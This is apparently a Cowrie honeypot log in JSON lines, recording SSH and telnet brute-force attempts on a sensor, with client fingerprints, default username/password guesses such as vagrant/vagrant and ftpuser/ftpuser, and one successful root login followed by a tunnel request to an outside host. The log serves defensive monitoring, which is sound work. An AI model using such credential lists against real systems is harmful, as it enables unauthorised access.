{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:02:21.302312Z","src_ip":"212.227.235.229","session":"60a84b2f38f6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:02:21.446363Z","src_ip":"212.227.235.229","session":"60a84b2f38f6"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"123456","message":"login attempt [elsearch/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:02:22.091588Z","src_ip":"212.227.235.229","session":"60a84b2f38f6"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:02:23.239550Z","src_ip":"212.227.235.229","session":"60a84b2f38f6"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":57704,"dst_ip":"1.2.3.4","dst_port":23,"session":"6e48c646614e","protocol":"telnet","message":"New connection: 8.222.212.69:57704 (1.2.3.4:23) [session: 6e48c646614e]","sensor":"my-vps","timestamp":"2025-08-28T06:02:25.130619Z"}
{"eventid":"cowrie.session.connect","src_ip":"8.217.196.121","src_port":58916,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fc98528d439","protocol":"ssh","message":"New connection: 8.217.196.121:58916 (1.2.3.4:22) [session: 2fc98528d439]","sensor":"my-vps","timestamp":"2025-08-28T06:02:26.459362Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:02:26.657037Z","src_ip":"8.217.196.121","session":"2fc98528d439"}
{"eventid":"cowrie.session.closed","duration":34.9307279586792,"message":"Connection lost after 34 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:02:30.138140Z","src_ip":"8.222.212.69","session":"0d7ec46c82f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55950,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bbf4ce9a767","protocol":"ssh","message":"New connection: 212.227.125.160:55950 (1.2.3.4:22) [session: 6bbf4ce9a767]","sensor":"my-vps","timestamp":"2025-08-28T06:02:32.014541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:02:32.019381Z","src_ip":"212.227.125.160","session":"6bbf4ce9a767"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:02:32.123549Z","src_ip":"212.227.125.160","session":"6bbf4ce9a767"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:02:32.541461Z","src_ip":"212.227.125.160","session":"6bbf4ce9a767"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:02:33.648277Z","src_ip":"212.227.125.160","session":"6bbf4ce9a767"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56916,"dst_ip":"1.2.3.4","dst_port":22,"session":"58bdab1dc310","protocol":"ssh","message":"New connection: 212.227.235.229:56916 (1.2.3.4:22) [session: 58bdab1dc310]","sensor":"my-vps","timestamp":"2025-08-28T06:02:36.189279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:02:36.190248Z","src_ip":"212.227.235.229","session":"58bdab1dc310"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:02:36.333680Z","src_ip":"212.227.235.229","session":"58bdab1dc310"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:02:36.766027Z","src_ip":"212.227.235.229","session":"58bdab1dc310"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:02:37.911295Z","src_ip":"212.227.235.229","session":"58bdab1dc310"}
{"eventid":"cowrie.session.closed","duration":31.305689096450806,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:02:51.255268Z","src_ip":"8.222.212.69","session":"a8900f18f0b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58854,"dst_ip":"1.2.3.4","dst_port":22,"session":"51aa7b096f8e","protocol":"ssh","message":"New connection: 212.227.235.229:58854 (1.2.3.4:22) [session: 51aa7b096f8e]","sensor":"my-vps","timestamp":"2025-08-28T06:02:52.305469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:02:52.306931Z","src_ip":"212.227.235.229","session":"51aa7b096f8e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:02:52.450915Z","src_ip":"212.227.235.229","session":"51aa7b096f8e"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"vagrant","message":"login attempt [vagrant/vagrant] failed","sensor":"my-vps","timestamp":"2025-08-28T06:02:53.072278Z","src_ip":"212.227.235.229","session":"51aa7b096f8e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:02:54.219083Z","src_ip":"212.227.235.229","session":"51aa7b096f8e"}
{"eventid":"cowrie.session.closed","duration":33.1951048374176,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:02:58.325653Z","src_ip":"8.222.212.69","session":"6e48c646614e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37090,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7a959f0cd60","protocol":"ssh","message":"New connection: 212.227.125.160:37090 (1.2.3.4:22) [session: a7a959f0cd60]","sensor":"my-vps","timestamp":"2025-08-28T06:03:13.853874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:03:13.872219Z","src_ip":"212.227.125.160","session":"a7a959f0cd60"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:03:13.963586Z","src_ip":"212.227.125.160","session":"a7a959f0cd60"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54700,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce73839b6c4f","protocol":"ssh","message":"New connection: 212.227.125.160:54700 (1.2.3.4:22) [session: ce73839b6c4f]","sensor":"my-vps","timestamp":"2025-08-28T06:03:14.221125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:03:14.221883Z","src_ip":"212.227.125.160","session":"ce73839b6c4f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:03:14.325432Z","src_ip":"212.227.125.160","session":"ce73839b6c4f"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-28T06:03:14.379104Z","src_ip":"212.227.125.160","session":"a7a959f0cd60"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123","message":"login attempt [esuser/123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:03:14.649023Z","src_ip":"212.227.125.160","session":"ce73839b6c4f"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:03:15.485883Z","src_ip":"212.227.125.160","session":"a7a959f0cd60"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:03:15.754407Z","src_ip":"212.227.125.160","session":"ce73839b6c4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43362,"dst_ip":"1.2.3.4","dst_port":22,"session":"8415745d6344","protocol":"ssh","message":"New connection: 212.227.235.229:43362 (1.2.3.4:22) [session: 8415745d6344]","sensor":"my-vps","timestamp":"2025-08-28T06:03:20.961209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:03:20.961900Z","src_ip":"212.227.235.229","session":"8415745d6344"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:03:21.105087Z","src_ip":"212.227.235.229","session":"8415745d6344"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"ftpuser","message":"login attempt [ftpuser/ftpuser] failed","sensor":"my-vps","timestamp":"2025-08-28T06:03:21.535296Z","src_ip":"212.227.235.229","session":"8415745d6344"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:03:22.679984Z","src_ip":"212.227.235.229","session":"8415745d6344"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48264,"dst_ip":"1.2.3.4","dst_port":22,"session":"3acf07a5eced","protocol":"ssh","message":"New connection: 212.227.125.160:48264 (1.2.3.4:22) [session: 3acf07a5eced]","sensor":"my-vps","timestamp":"2025-08-28T06:03:29.649318Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:03:29.650498Z","src_ip":"212.227.125.160","session":"3acf07a5eced"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48534,"dst_ip":"1.2.3.4","dst_port":22,"session":"efff9e2ebed7","protocol":"ssh","message":"New connection: 212.227.125.160:48534 (1.2.3.4:22) [session: efff9e2ebed7]","sensor":"my-vps","timestamp":"2025-08-28T06:03:29.760642Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:03:29.761380Z","src_ip":"212.227.125.160","session":"efff9e2ebed7"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T06:03:29.874736Z","src_ip":"212.227.125.160","session":"efff9e2ebed7"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:03:30.213477Z","src_ip":"212.227.125.160","session":"efff9e2ebed7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T06:03:30.326952Z","session":"efff9e2ebed7"}
{"eventid":"cowrie.session.connect","src_ip":"121.154.148.110","src_port":49817,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f5124b179f5","protocol":"telnet","message":"New connection: 121.154.148.110:49817 (1.2.3.4:23) [session: 0f5124b179f5]","sensor":"my-vps","timestamp":"2025-08-28T06:03:33.452359Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51380,"dst_ip":"1.2.3.4","dst_port":22,"session":"988a54908c78","protocol":"ssh","message":"New connection: 212.227.125.160:51380 (1.2.3.4:22) [session: 988a54908c78]","sensor":"my-vps","timestamp":"2025-08-28T06:03:35.724430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:03:35.725555Z","src_ip":"212.227.125.160","session":"988a54908c78"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:03:35.829967Z","src_ip":"212.227.125.160","session":"988a54908c78"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"esuser123","message":"login attempt [esuser/esuser123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:03:36.142589Z","src_ip":"212.227.125.160","session":"988a54908c78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40334,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdfe278748fe","protocol":"ssh","message":"New connection: 212.227.235.229:40334 (1.2.3.4:22) [session: fdfe278748fe]","sensor":"my-vps","timestamp":"2025-08-28T06:03:36.690889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:03:36.701815Z","src_ip":"212.227.235.229","session":"fdfe278748fe"}
